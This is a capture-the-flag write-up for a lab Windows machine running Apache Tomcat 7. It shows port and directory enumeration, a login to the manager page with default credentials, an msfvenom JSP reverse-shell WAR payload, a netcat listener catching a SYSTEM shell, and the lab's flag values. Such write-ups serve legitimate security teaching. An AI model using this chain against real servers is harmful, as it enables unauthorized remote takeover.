Jerry
Enumeration
As usual, we start with an nmap scan, in order to find open ports in the target machine.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.95 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Wed Jan 5 14:12:34 2022 as: nmap -sS -p- -T5 -Pn -n -oN allPorts 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.057s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
8080/tcp open http-proxy
# Nmap done at Wed Jan 5 14:15:18 2022 -- 1 IP address (1 host up) scanned in 164.58 secondsAs we see, port 8080 is the only one that is open. It looks like there is an HTTP service, let's try to obtain more information about the service and version running on that port. The following command will scan port 8080 more in depth and save the result into a file:
nmap -sC -sV -p8080 10.10.10.95 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Wed Jan 5 14:15:51 2022 as: nmap -p8080 -sCV -oN targeted 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 5 14:16:02 2022 -- 1 IP address (1 host up) scanned in 10.51 secondsSo we have an Apache Tomcat/Coyote JSP server. If we take a look into the web page with the web browser, we see the Apache default web page.
At this point, I would try to enumerate the web page directories with gobuster.
gobuster dir -u http://10.10.10.95:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200
direnumerates directories or files.-uthe target URL.-wpath to the wordlist.-tnumber of current threads, in this case 200 threads.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.95:8080/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/16 18:34:26 Starting gobuster in directory enumeration mode
===============================================================
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/manager (Status: 302) [Size: 0] [--> /manager/]
/con (Status: 200) [Size: 0]
/http%3A%2F%2Fwww (Status: 400) [Size: 0]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 0]
/http%3A%2F%2Fblogs (Status: 400) [Size: 0]
/http%3A%2F%2Fblog (Status: 400) [Size: 0]
/**http%3A%2F%2Fwww (Status: 400) [Size: 0]
/External%5CX-News (Status: 400) [Size: 0]
/http%3A%2F%2Fcommunity (Status: 400) [Size: 0]
/http%3A%2F%2Fradar (Status: 400) [Size: 0]
/http%3A%2F%2Fjeremiahgrossman (Status: 400) [Size: 0]
/http%3A%2F%2Fswik (Status: 400) [Size: 0]
===============================================================
2022/01/16 18:40:14 Finished
===============================================================Exploitation
If we take a look at the /manager directory, a popup login form appears.
Let's try some random credentials, such as user admin password admin.
We get a 403 Access Denied message. If you look closely, some default credentials appear on a certain line.
Now we have the user tomcat with the password s3cret. Let's refresh the page and enter the default credentials.
If you refresh the page and the 403 message still appears, close the browser and open it again.
And we got in! The next step is to get a reverse shell. If we check out the web page, we could see there is a Deploy section in which we can upload WAR files.
At this point, the idea is to create a WAR payload with msfvenom, upload it to the web page, and get a reverse shell.
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.14 lport=4444 -f war -o reverse_shell.war
-pindicates the type of payload.lhostlocal host IP.lportlocal port of the listener.-foutput format.-osave the output to a file.
All we have to do is upload the payload and hit Deploy.
Under the Application section, a new row should appear with the path of our uploaded payload.
Finally, all we have to do is set a netcat listener on port 4444 and hit the /reverse_shell path.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
listening on [any] 4444 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\systemWe are already the nt authority\system user, so all we have to do is reap the harvest and get the flags.
C:\apache-tomcat-7.0.88>type c:\users\administrator\desktop\flags\2*
type c:\users\administrator\desktop\flags\2*
user.txt
7004dbcef0f854e0fb401875f26ebd00
root.txt
04a8b36e1545a455393d067e772fe90eLast updated
Was this helpful?